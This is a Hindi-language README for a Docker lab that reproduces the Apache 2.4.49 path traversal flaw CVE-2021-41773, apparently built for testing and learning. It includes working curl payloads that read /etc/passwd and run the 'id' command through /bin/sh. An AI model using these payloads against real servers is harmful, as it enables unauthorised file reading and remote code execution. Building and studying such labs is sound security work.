
# CVE-2021-41773 Apache पाथ ट्रैवर्सल के लिए Docker-आधारित असुरक्षित लैब, जो नियंत्रित वातावरण में फ़ाइल पढ़ने और रिमोट कोड निष्पादन के लिए PoC कॉन्फ़िगरेशन प्रदान करता है।
यह भेद्यता केवल संस्करण 2.4.49 पर लागू होती है, जिसमें विशेष गैर-डिफ़ॉल्ट कॉन्फ़िगरेशन होते हैं। कुछ स्थितियों में इसके परिणामस्वरूप फ़ाइल पठन या कोड निष्पादन हो सकता है।
https://twitter.com/ptswarm/status/1445376079548624899
कंटेनरों को सीधे Docker Hub से निम्न कमांड का उपयोग करके पुल किया जा सकता है
docker pull blueteamsteve/cve-2021-41773:no-cgid
और निम्न कमांड का उपयोग करके निष्पादित किया जा सकता है
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:no-cgid
Apache लॉग्स को नीचे दिए गए कमांड से देखा जा सकता है, या stdio स्ट्रीम करने के लिए उपरोक्त run कमांड से "-dit" हटा दें
docker logs <container-id>
curl http://localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd
कंटेनरों को सीधे Docker Hub से निम्न कमांड का उपयोग करके पुल किया जा सकता है
docker pull blueteamsteve/cve-2021-41773:with-cgid
और निम्न कमांड का उपयोग करके निष्पादित किया जा सकता है
docker run -dit -p 8080:80 blueteamsteve/cve-2021-41773:with-cgid
Apache लॉग्स को नीचे दिए गए कमांड से देखा जा सकता है, या stdio स्ट्रीम करने के लिए उपरोक्त run कमांड से "-dit" हटा दें
docker logs <container-id>
curl 'localhost:8080/cgi-bin/.%2e/.%2e/.%2e/.%2e/bin/sh' -d 'A=|echo;id'
सबडायरेक्टरीज़ में मौजूद dockerfile और टेम्पलेट httpd.conf फ़ाइलों का उपयोग करके अपने स्वयं के संस्करणों को संशोधित और बनाएँ